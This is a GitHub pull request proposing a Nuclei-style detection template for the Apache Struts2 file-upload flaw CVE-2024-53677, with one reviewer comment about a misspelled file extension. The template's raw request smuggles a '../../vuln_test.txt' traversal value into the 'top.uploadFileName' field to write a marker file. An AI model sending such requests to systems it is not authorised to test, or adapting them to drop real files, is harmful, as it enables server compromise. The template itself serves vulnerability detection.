Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CVE-2024-53677.ymal #11419

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

CVE-2024-53677.ymal #11419

wants to merge 1 commit into from
+54 −0

Conversation

MrHarshvardhan
Copy link
Contributor

@MrHarshvardhan MrHarshvardhan commented Dec 27, 2024
edited by ehsandeep
Loading 

id: CVE-2024-53677

info:
  name: Apache Struts2 - Arbitrary File Upload Vulnerability (CVE-2024-53677)
  author: MrHarshvardhan
  severity: critical
  description: |
    Apache Struts2 versions affected by CVE-2024-53677 allow arbitrary file uploads via improper OGNL expression handling, enabling attackers to overwrite arbitrary files.
  impact: |
    Successful exploitation could allow remote attackers to overwrite arbitrary files on the server, leading to Remote Code Execution (RCE) or sensitive data exposure.
  remediation: |
    Upgrade Apache Struts2 to a patched version immediately.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-53677
    - https://github.com/TAM-K592/CVE-2024-53677-S2-067/blob/ALOK/Check-CVE-2024-53677.py
  classification:
    cve-id: CVE-2024-53677
    cwe-id: CWE-434
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    vendor: Apache
    product: Struts2
  tags: apache,struts2,file-upload,cve2024,critical

variables:
  upload_endpoint: "{{UploadEndpoint}}"

http:
  - raw:
      - |
        POST {{BaseURL}}{{upload_endpoint}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{RandomBoundary}}

        ------WebKitFormBoundary{{RandomBoundary}}
        Content-Disposition: form-data; name="upload"; filename="test.txt"
        Content-Type: text/plain

        S2-067 detection test.
        ------WebKitFormBoundary{{RandomBoundary}}
        Content-Disposition: form-data; name="top.uploadFileName"

        ../../vuln_test.txt
        ------WebKitFormBoundary{{RandomBoundary}}--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "vuln_test.txt")'
        condition: and

@ivaldivieso
Copy link

It seems that the file has an incorrect extension (.ymal). The correct extension should be .yaml. Please update it accordingly to ensure proper handling and compatibility.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@MrHarshvardhan @ivaldivieso